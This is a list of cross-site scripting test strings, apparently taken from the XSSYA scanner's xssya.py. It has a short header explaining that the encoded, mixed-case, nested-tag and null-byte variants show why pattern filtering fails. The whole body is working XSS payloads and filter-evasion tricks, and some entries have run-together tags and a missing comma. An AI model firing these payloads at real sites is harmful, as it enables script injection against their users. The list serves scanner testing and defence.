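XSS payloads
1. 代码来自 xssya.py (the strings below are copied from xssya.py, the test-string list of the XSSYA scanner). The list repeats a small set of script and event-handler probes in plain, URL-encoded, double-encoded, mixed-case, nested-tag and %00-split form. Pattern-based input filtering is therefore not a reliable defence against them; reflected output needs context-aware encoding, and any filter has to be checked against the fully decoded value.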
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
"<scr<script>ipt>alert(1)</scr<script>ipt>",
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<formaction=\"Javascript:alert(1)\"><inputtype=submit>",
"<isindexaction=data:text/html,type=image>",
"<objectdata=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<bodyonload=prompt(1);>",
"<q/oncut=open()>",
"<aonmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindexaction=j	a	vas	c	r	ipt:alert(1)type=image>",
"<marquee/onstart=confirm(2)>",
"<AHREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>"